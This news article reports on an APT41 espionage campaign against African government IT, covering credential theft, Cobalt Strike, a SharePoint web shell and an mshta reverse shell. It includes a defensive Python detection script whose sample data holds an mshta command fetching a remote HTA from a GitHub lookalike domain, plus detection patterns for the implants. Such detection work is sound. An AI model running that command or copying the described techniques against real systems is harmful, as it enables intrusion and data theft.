China-Linked Hackers Target African IT Systems in Espionage Campaign

A China-linked cyber-espionage group known as APT41 has been connected to a new campaign targeting government IT services across Africa. 

According to Kaspersky researchers Denis Kulik and Daniil Pogorelov, the attackers embedded hardcoded names of internal services, IP addresses, and proxy servers within their malware. Notably, one of the command-and-control (C2) servers was actually a compromised SharePoint server inside the victim’s infrastructure. 

APT41 is a well-known Chinese state-sponsored threat group that has targeted a wide range of sectors globally, including telecommunications, energy, education, and healthcare, across more than 30 countries. What sets this campaign apart is its focus on Africa, a region previously seen as less affected by this group. However, this aligns with Trend Micro’s past reports that APT41 began increasing activity on the continent in late 2022. 

Kaspersky launched an investigation after detecting suspicious activity on several workstations belonging to an undisclosed organization's IT environment. The attackers were seen running commands to check the availability of their C2 servers either directly or through internal proxies. 

The root of the suspicious behavior was an overlooked host that had been breached. On this host, Impacket was run using a service account, and after modules like Atexec and WmiExec were executed, the attackers paused their activity. They soon resumed by stealing credentials for privileged accounts, allowing them to escalate privileges and move laterally within the network. Eventually, they deployed Cobalt Strike using DLL side-loading for C2 operations. These DLLs checked for the presence of certain language packs like Japanese, Korean, Simplified Chinese, and Traditional Chinese, and only ran if those were absent. 

The group also used a compromised SharePoint server to send commands to C#-based malware planted on victim systems. Files named agents.exe and agentx.exe were delivered over the SMB protocol. These files, actually C# trojans, executed instructions from a web shell called CommandHandler.aspx hosted on the SharePoint server. This approach combined traditional malware techniques with living-off-the-land tactics, making detection difficult. These tactics match MITRE ATT&CK techniques such as T1071.001 (Web Protocols) and T1047 (WMI).

Following reconnaissance, the attackers prioritized machines they found valuable, downloading a malicious HTML Application (HTA) file embedded with JavaScript using mshta.exe. The payload came from a domain mimicking GitHub (github.githubassets[.]net) and was designed to create a reverse shell, enabling remote command execution. In addition, they used various tools to gather and exfiltrate data via the SharePoint server. 
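The intrusion chain described above leaves a few observable traces a defender can alert on: mshta.exe launched with a remote URL, the agents.exe / agentx.exe file names, requests to the CommandHandler.aspx web shell on an internal SharePoint host, and the GitHub lookalike domain. The following is an added example, not Kaspersky's code or a detection from the report; it runs those checks over constructed JSON-lines telemetry (the event schema, host names and the sp01.corp.local SharePoint host are assumptions for illustration).

```python
import json
import re

# Constructed sample telemetry (not from the report), one JSON event per line,
# loosely modelled on EDR process-creation and web-proxy records.
SAMPLE_EVENTS = r"""
{"type":"process","host":"ws01","image":"C:\\Windows\\System32\\mshta.exe","cmdline":"mshta.exe https://github.githubassets.net/u.hta"}
{"type":"process","host":"ws02","image":"C:\\Windows\\System32\\mshta.exe","cmdline":"mshta.exe C:\\setup\\install.hta"}
{"type":"process","host":"ws03","image":"C:\\Users\\Public\\agentx.exe","cmdline":"agentx.exe"}
{"type":"http","host":"ws04","url":"http://sp01.corp.local/_layouts/15/CommandHandler.aspx","method":"POST"}
{"type":"http","host":"ws05","url":"http://sp01.corp.local/_layouts/15/start.aspx","method":"GET"}
"""

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
DROPPED_AGENTS = {"agents.exe", "agentx.exe"}       # trojan file names from the report
WEBSHELL_PATH = "commandhandler.aspx"               # web shell name from the report
LOOKALIKE_DOMAIN = "github.githubassets.net"        # lookalike domain from the report (defanged there)


def classify(event):
    """Return the list of rule names an event triggers (empty if benign)."""
    hits = []
    if event["type"] == "process":
        image = event["image"].rsplit("\\", 1)[-1].lower()
        cmdline = event["cmdline"].lower()
        # mshta.exe fetching an HTA from the network rather than a local path
        if image == "mshta.exe" and REMOTE_URL.search(cmdline):
            hits.append("mshta remote HTA")
        if image in DROPPED_AGENTS:
            hits.append("known C# trojan filename")
        if LOOKALIKE_DOMAIN in cmdline:
            hits.append("lookalike domain")
    elif event["type"] == "http":
        url = event["url"].lower()
        # Web-shell traffic to the internal SharePoint server used as C2 (T1071.001)
        if url.split("?", 1)[0].endswith(WEBSHELL_PATH):
            hits.append("SharePoint web shell (T1071.001)")
        if LOOKALIKE_DOMAIN in url:
            hits.append("lookalike domain")
    return hits


def scan(text):
    """Parse JSON-lines telemetry and return (host, hits) for every flagged event."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            event = json.loads(line)
            hits = classify(event)
            if hits:
                alerts.append((event["host"], hits))
    return alerts


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Only ws01, ws03 and ws04 are flagged; the local HTA on ws02 and the ordinary SharePoint page on ws05 pass, which is the distinction that keeps the mshta and web-shell rules usable in a real environment.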

Some tools employed in the attacks include: 

  • A modified version of Pillager, used to extract browser credentials, SSH/FTP sessions, source code, screenshots, emails, chat logs, installed applications, and system information. 
  • Checkout, used to harvest credit card details and download history from browsers like Chrome, Opera, Brave, and Cốc Cốc. 
  • RawCopy, to extract raw registry data. 
  • Mimikatz, for dumping account credentials. 

Kaspersky emphasized that APT41 uses both custom and publicly available tools, including red-team utilities like Cobalt Strike, to achieve its objectives. The group quickly adapts to the target's environment and can even repurpose internal infrastructure for command and control or data theft.

This campaign blurs the line between ethical red teaming and real-world attacks, using tools like Impacket, Mimikatz, and Cobalt Strike alongside bespoke implants. These overlaps make it challenging for defenders to identify lateral movement, credential theft, and evasion tactics, especially in Windows-based systems. 
